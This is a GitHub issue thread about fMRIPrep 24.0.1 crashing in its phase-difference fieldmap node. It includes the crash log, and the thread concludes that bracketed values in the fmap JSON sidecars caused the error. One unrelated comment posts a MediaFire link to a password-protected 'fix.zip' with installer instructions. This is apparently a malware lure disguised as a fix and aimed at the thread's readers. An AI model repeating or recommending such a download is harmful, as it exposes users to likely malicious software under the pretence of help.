### ISSUE TITLE
problem with fmriprep_24_0_wf.sub_002_wf.fmap_preproc_wf.wf_auto_00000.phdiff_wf.compfmap 

### ISSUE THREAD

**Issue by CogBrainHealthLab** [nipreps/fmriprep#3357]
### What happened?

fMRIprep failed at the fmriprep_24_0_wf.sub_002_wf.fmap_preproc_wf.wf_auto_00000.phdiff_wf.compfmap node. This error occurred for everyone in the dataset.

If i were to take away the fmap directory, fMRIprep will be able to complete without any issue

here's the directory tree of a subject

```
sub-002
├── anat
│   ├── sub-002_FLAIR.json
│   ├── sub-002_FLAIR.nii.gz
│   ├── sub-002_T1w.json
│   └── sub-002_T1w.nii.gz
├── dwi
│   ├── sub-002_dir-AP_dwi.bval
│   ├── sub-002_dir-AP_dwi.bvec
│   ├── sub-002_dir-AP_dwi.json
│   ├── sub-002_dir-AP_dwi.nii.gz
│   ├── sub-002_dir-PA_dwi.json
│   └── sub-002_dir-PA_dwi.nii.gz
├── fmap
│   ├── sub-002_magnitude1.json
│   ├── sub-002_magnitude1.nii.gz
│   ├── sub-002_magnitude2.json
│   ├── sub-002_magnitude2.nii.gz
│   ├── sub-002_phasediff.json
│   └── sub-002_phasediff.nii.gz
└── func
    ├── sub-002_task-rest_bold.json
    ├── sub-002_task-rest_bold.nii.gz
    ├── sub-002_task-rest_sbref.json
    └── sub-002_task-rest_sbref.nii.gz

```

### What command did you use?

```shell
fmriprep BIDS /home/junhong.yu/LFC/output participant -w /home/junhong.yu/LFC/work \
    --skip_bids_validation --output-spaces MNI152NLin6Asym \
    --cifti-output 91k --nthreads 2
```

### What version of fMRIPrep are you running?

24.0.1

### How are you running fMRIPrep?

Local installation ("Bare-metal")

### Is your data BIDS valid?

Yes

### Are you reusing any previously computed results?

FreeSurfer

### Please copy and paste any relevant log output.

```shell
File: <workdir>/sub-002/log/20240828-233744_f52e6773-7232-47b0-aab0-010f8b5403d6/crash-20240828-233958-junhong.yu-compfmap-b793ebd3-0d2a-4e02-b670-94d55e7d3bb9.txt
Working Directory: /home/junhong.yu/LFC/work/fmriprep_24_0_wf/sub_002_wf/fmap_preproc_wf/wf_auto_00000/phdiff_wf/compfmap
Inputs:

    in_file: /home/junhong.yu/LFC/work/fmriprep_24_0_wf/sub_002_wf/fmap_preproc_wf/wf_auto_00000/phdiff_wf/prelude/sub-002_phasediff_rads_unwrapped.nii
    metadata: {'Modality': ['MR'], 'MagneticFieldStrength': [3], 'ImagingFrequency': [123.2627], 'Manufacturer': ['Siemens'], 'ManufacturersModelName': ['Prisma_fit'], 'InstitutionName': ['Centre for Translational MR Research'], 'InstitutionalDepartmentName': ['Department'], 'InstitutionAddress': ['14 Medical Drive #B1-01,Singapore,Singapore,SG,117599'], 'DeviceSerialNumber': ['67021'], 'StationName': ['MRC35269'], 'BodyPartExamined': ['BRAIN'], 'PatientPosition': ['HFS'], 'ProcedureStepDescription': ['Active Studies^CHIF'], 'SoftwareVersions': ['syngo MR E11'], 'MRAcquisitionType': ['2D'], 'SeriesDescription': ['gre_field_mapping_2.5mm'], 'ProtocolName': ['gre_field_mapping_2.5mm'], 'ScanningSequence': ['GR'], 'SequenceVariant': ['SP'], 'SequenceName': ['*fm2d2r'], 'ImageType': ['ORIGINAL', 'PRIMARY', 'P', 'ND', 'PHASE'], 'NonlinearGradientCorrection': [False], 'SeriesNumber': [10], 'AcquisitionTime': ['10:38:9.807500'], 'AcquisitionNumber': [1], 'SliceThickness': [2.5], 'SpacingBetweenSlices': [2.5], 'SAR': [0.1599], 'EchoNumber': [2], 'EchoTime': [0.0074], 'RepetitionTime': [0.615], 'FlipAngle': [60], 'EchoTime1': [0.0049], 'EchoTime2': [0.0074], 'PartialFourier': [1], 'BaseResolution': [88], 'ShimSetting': [-154, 407, 207, 371, -95, 2, -71, -118], 'TxRefAmp': [248.471], 'PhaseResolution': [1], 'ReceiveCoilName': ['Head_32'], 'ReceiveCoilActiveElements': ['HEA;HEP'], 'PulseSequenceDetails': ['%SiemensSeq%\\gre_field_mapping'], 'CoilCombinationMethod': ['Sum of Squares'], 'ConsistencyInfo': ['N4_VE11E_LATEST_20181129'], 'MatrixCoilMode': ['SENSE'], 'PercentPhaseFOV': [100], 'PercentSampling': [100], 'PhaseEncodingSteps': [88], 'AcquisitionMatrixPE': [88], 'ReconMatrixPE': [88], 'PixelBandwidth': [390], 'DwellTime': [0], 'PhaseEncodingDirection': ['j-'], 'SliceTiming': [0.3047, 0, 0.3203, 0.0078, 0.3281, 0.0234, 0.3359, 0.0312, 0.3438, 0.0391, 0.3594, 0.0469, 0.3672, 0.0625, 0.375, 0.0703, 0.3906, 0.0859, 0.3984, 0.0938, 0.4062, 0.1016, 0.4219, 0.1094, 0.4297, 0.125, 0.4375, 0.1328, 0.4531, 0.1406, 0.4609, 0.1562, 0.4688, 0.1641, 0.4766, 0.1719, 0.4922, 0.1875, 0.5, 0.1953, 0.5156, 0.2031, 0.5234, 0.2188, 0.5312, 0.2266, 0.5391, 0.2344, 0.5547, 0.2422, 0.5625, 0.2578, 0.5703, 0.2656, 0.5859, 0.2734, 0.5938, 0.2891, 0.6016, 0.2969], 'ImageOrientationPatientDICOM': [0.9993, -0.037, 0.0104, 0.0384, 0.9773, -0.2083], 'ImageOrientationText': ['Tra>Cor(-12.0)>Sag(0.1)'], 'InPlanePhaseEncodingDirectionDICOM': ['COL'], 'ConversionSoftware': ['dcm2niix'], 'ConversionSoftwareVersion': ['v1.0.20230411'], 'Dcm2bidsVersion': ['3.1.1'], 'IntendedFor': ['func/sub-002_task-rest_bold.nii.gz', 'func/sub-002_task-rest_sbref.nii.gz']}

Traceback (most recent call last):
  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/nipype/pipeline/plugins/multiproc.py", line 67, in run_node
    result["result"] = node.run(updatehash=updatehash)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/nipype/pipeline/engine/nodes.py", line 527, in run
    result = self._run_interface(execute=True)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/nipype/pipeline/engine/nodes.py", line 645, in _run_interface
    return self._run_command(execute)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/nipype/pipeline/engine/nodes.py", line 771, in _run_command
    raise NodeExecutionError(msg)
nipype.pipeline.engine.nodes.NodeExecutionError: Exception raised while executing Node compfmap.

Traceback:
	Traceback (most recent call last):
	  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/nipype/interfaces/base/core.py", line 397, in run
	    runtime = self._run_interface(runtime)
	              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/sdcflows/interfaces/fmap.py", line 126, in _run_interface
	    self.inputs.in_file, _delta_te(self.inputs.metadata), newpath=runtime.cwd
	                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/home/junhong.yu/fmriprepenv/lib64/python3.11/site-packages/sdcflows/utils/phasemanip.py", line 146, in delta_te
	    te2 = float(te2 or "unknown")
	          ^^^^^^^^^^^^^^^^^^^^^^^
	TypeError: float() argument must be a string or a real number, not 'list'
```

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by effigies** [comment]
What happens if you don't skip validation?

**Comment by CogBrainHealthLab** [comment]
When bids-validator was run it pointed out some issues with task-rest_sbref.json . More specifically, there were unnecessary square brackets for some of the rows, such as "EchoTime": [0.03], that caused the values to be read incorrectly. So i fixed this issue, bid-validator no longer flags any problems. But i still encountered the same problem with fmriprep_24_0_wf.sub_002_wf.fmap_preproc_wf.wf_auto_00000.phdiff_wf.compfmap node

then i found out that all the *.json files in the fmap directory had the same problem with the square brackets. After fixing them, fMRIprep was able to complete the subject without any issues
